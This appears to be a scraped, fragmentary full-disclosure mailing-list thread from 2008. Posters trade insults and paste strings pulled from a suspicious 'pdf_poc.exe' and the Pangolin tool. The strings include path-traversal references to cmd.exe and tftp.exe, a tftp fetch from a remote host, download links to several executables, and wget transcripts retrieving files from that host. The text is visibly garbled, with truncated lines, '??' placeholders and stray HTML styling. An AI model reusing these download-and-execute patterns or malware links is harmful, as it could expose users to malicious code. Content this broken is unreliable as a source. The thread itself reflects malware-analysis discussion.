Mike and the Twinkies,
You're a genius. To the other security twinkies that are very well
versed in strings analysis please get another job at the local
newspaper co.
So if it went clear through VirusTotal you would run it on your
machines? I'd be happy to provide a DumbassTotal service for all o
Just some interesting strings and such:
pdf_poc.exe:
http://analysis.seclab.tuwien.ac.at/result.php?taskid=024c7616e34fe444398545b69c829e1d&refresh=1
..\\..\\..\\..\\windows\\system32\\cmd.exe
..\\..\\..\\..\\windows\\system32\\tftp.exe
-i zwell.3322.org
a.bat
Cpdf_poc.txt
Cpdf_poc.txt
Cpdf_poc.
http://www.nosec.org/web/files/demon.exe
http://www.virustotal.com/analisis/0bfb9d08a2dfe0ad413d08491d0a82a3
http://www.nosec.org/web/files/pdf_poc.exe
http://www.virustotal.com/analisis/d619319b2c4a7c5bb3a81adf25bf6559
http://www.nosec.org/web/files/zps.exe
http://www.virustotal.com/analisis/26d
Ok, you are right.
[EMAIL PROTECTED] ~ % wget
http://www.nosec.org/web/index.txt
:(
--20:23:14-- http://www.nosec.org/web/index.txt
=> `index.txt'
Auflösen des Hostnamen »
Not yet.
C:\Users\Micheal\Research>wget http://www.nosec.org/web/index.txt
--15:12:52-- http://www.nosec.org/web/index.txt
=> `index.txt'
Resolving www.nosec.org... done.
Connecting to www.nosec.org[218.92.8.74]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13
With firefox - URL: *http://www.nosec.org/a.exe*
http://www.w3.org/TR/html4/strict.dtd";>
??
BODY { font: 9pt/12pt ?? }
H1 { font: 12pt/15pt ?? }
H2 { font: 9pt/12pt ?? }
A:link { color: red }
A:visited { color: maroon }
??
???:
?
Hi Folks,
Just for curiosity, did anyone of this list already tried to do a reverse
engineering
of the Pangolin's code ?
Ricardo> Not me, although I did looked at it. I thought great, kiddies
are going to love this > Sent from my BlackBerry® smartphone with
SprintSpeed > > -Original Messag
C:\Users\Micheal\Research>..\bin\upx\upx -d pangolin_bin\out\pangolin.exe
Ultimate Packer for eXecutables
Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007
UPX 3.02w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 16th 2007
File size
Not me, although I did looked at it. I thought great, kiddies are going to love
this
Sent from my BlackBerry® smartphone with SprintSpeed
-Original Message-
From: davidrook <[EMAIL PROTECTED]>
Date: Wed, 26 Mar 2008 17:23:03
To:Razi Shaban <[EMAIL PROTECTED]>
Cc:full-disclosure@lists.gr